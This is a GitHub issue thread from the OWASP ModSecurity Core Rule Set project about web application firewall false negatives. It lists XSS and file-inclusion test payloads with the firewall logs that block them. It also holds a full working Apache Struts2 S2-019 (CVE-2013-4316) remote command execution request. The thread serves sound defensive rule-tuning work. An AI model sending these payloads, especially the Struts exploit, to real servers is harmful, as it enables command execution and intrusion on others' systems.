### ISSUE TITLE
Couple false-negatives

### ISSUE THREAD

**Issue by migolovanov** [SpiderLabs/owasp-modsecurity-crs#891]
These attacks are not blocked by current version:
```
?test=%27+%0A%09%09%09%09%09%09};+%0A%09%09%09%09%09%09alert%280%29;+%0A%09%09%09%09%09%09a%20=%20{+%0A%09%09%09%09%09%09%09%27a%27+:+%27
?test=%27+alert(1)&&null==%27
?test=%27+alert(%27XSS%27)+%27
?test=C%3A/inetpub/wwwroot/global.asa
?test=C%3A%5Cinetpub%5Cwwwroot%5Cglobal.asa
?test=././.htaccess
```

**Comment by spartantri** [comment]
Hi @migolovanov, I checked with 3.0.2 in PL4 detected 5/6 listed payloads but global.asa is not in the blacklisted files list in rules/lfi-os-files.dat, opened PR 894 to fix it

False negative
```
?test=C%3A/inetpub/wwwroot/global.asa
<html><body><h1>Everything seems to work properly !</h1></body></html>
```

True Positives
```
?test=C%3A%5Cinetpub%5Cwwwroot%5Cglobal.asa
[Mon Sep 18 09:47:57.666654 2017] [:error] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?<!\\\\Q\\\\\\\\E)\\\\Q\\\\\\\\E[cdeghijklmpqwxyz123456789]" at REQUEST_URI. [id "920460"] [rev "1"] [msg "Abnormal character escapes in request"] [data "Matched Data: \\x5ci found within REQUEST_URI: /index.html?test=c:\\x5cinetpub\\x5cwwwroot\\x5cglobal.asa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.2"] [maturity "1"] [accuracy "1"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/4"] 

?test=%27+%0A%09%09%09%09%09%09};+%0A%09%09%09%09%09%09alert%280%29;+%0A%09%09%09%09%09%09a%20=%20{+%0A%09%09%09%09%09%09%09%27a%27+:+%27
[Mon Sep 18 09:44:04.839396 2017] [:error] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(\\\\n|\\\\r)" at ARGS_GET:test. [id "921151"] [rev "1"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)"] [data "Matched Data: \\x0a found within ARGS_GET:test: ' \\x0a\\x09\\x09\\x09\\x09\\x09\\x09}; \\x0a\\x09\\x09\\x09\\x09\\x09\\x09alert(0); \\x0a\\x09\\x09\\x09\\x09\\x09\\x09a = { \\x0a\\x09\\x09\\x09\\x09\\x09\\x09\\x09'a' : '"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.2"] [maturity "5"] [accuracy "5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/2"]

?test=%27+alert(1)&&null==%27
[Mon Sep 18 09:27:26.332196 2017] [:error] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`;]+|[\\"'`]+$)" at ARGS:test. [id "942110"] [rev "4"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:test: ' alert(1)"] [severity "WARNING"] [ver "OWASP_CRS/3.0.2"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/2"]

?test=%27+alert(%27XSS%27)+%27
[Mon Sep 18 09:28:59.686547 2017] [:error] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`;]+|[\\"'`]+$)" at ARGS:test. [id "942110"] [rev "4"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:test: ' alert('XSS') '"] [severity "WARNING"] [ver "OWASP_CRS/3.0.2"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/2"]

?test=././.htaccess
[Mon Sep 18 09:33:59.206641 2017] [:error] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4}" at ARGS:test. [id "942460"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters"] [data "Matched Data: ././ found within ARGS:test: ././.htaccess"] [severity "WARNING"] [ver "OWASP_CRS/3.0.2"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/3"]
```

**Comment by migolovanov** [comment]
@spartantri, yes, sorry, my mistake. Was checking with PL1.

**Comment by dune73** [comment]
Thank you for the info @migolovanov.

Most of them trigger on PL2, it might be worth checking if we can shift the .htaccess payload to PL2 as well. PL3 is a bit high for something that obvious.

**Comment by spartantri** [comment]
Sure, look at the log for [tag "paranoia-level/#"], 3 of the payloads trigger at PL2, one on PL3 and another one on PL4.

**Comment by dune73** [comment]
@spartantri: I figured that out as well (after submitting my comment :)

So I think it boils down to think about how to shift the PL3 alert to at least PL2. Or am I wrong?

Ideally, 930130 should catch `?test=././.htaccess`, or am I wrong?

**Comment by csanders-git** [comment]
we can also add global.asa to the same place we have things like htaccess and such

**Comment by migolovanov** [comment]
Just for the info, working apache struts2 exploit for S2-019 (CVE-2013-4316) is also not blocked on PL1 ~and PL2~

```
/S2-019/example/HelloWorld.action?debug=command&expression=%23a%3d(new+java.lang.ProcessBuilder(%23parameters.cmd[0])).start(),%23b%3d%23a.getInputStream(),%23c%3dnew+java.io.InputStreamReader(%23b),%23d%3dnew+java.io.BufferedReader(%23c),%23e%3dnew+char[50000],%23d.read(%23e),%23out%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23out.getWriter().println('dbapp%3a'%2bnew+java.lang.String(%23e)),%23out.getWriter().close()&cmd=id
```

```
Message: Warning. Found 56 byte(s) in ARGS:expression outside range: 38,44-46,48-58,61,65-90,95,97-122. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1451"] [id "920273"] [rev "2"] [msg "Invalid character in request (outside of very strict set)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [tag "paranoia-level/4"]
Message: Warning. Pattern match "\\W{4}" at ARGS:expression. [file "/usr/share/modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "1251"] [id "942460"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters"] [data "Matched Data: ])). found within ARGS:expression: #a=(new java.lang.ProcessBuilder(#parameters.cmd[0])).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#out=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#out.getWriter().println('dbapp:' new java.lang.String(#e)),#out.getWriter().close()"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [tag "paranoia-level/3"]
```

**Comment by lifeforms** [comment]
@migolovanov We are working on Java exploits in #881, could you comment with any Java payloads there? ❤

**Comment by migolovanov** [comment]
yes, sure. will keep in mind that in future.

**Comment by fgsch** [comment]
This issue has timed out as it has not received any update in over 2 years.
If this is still a problem please open a new issue.
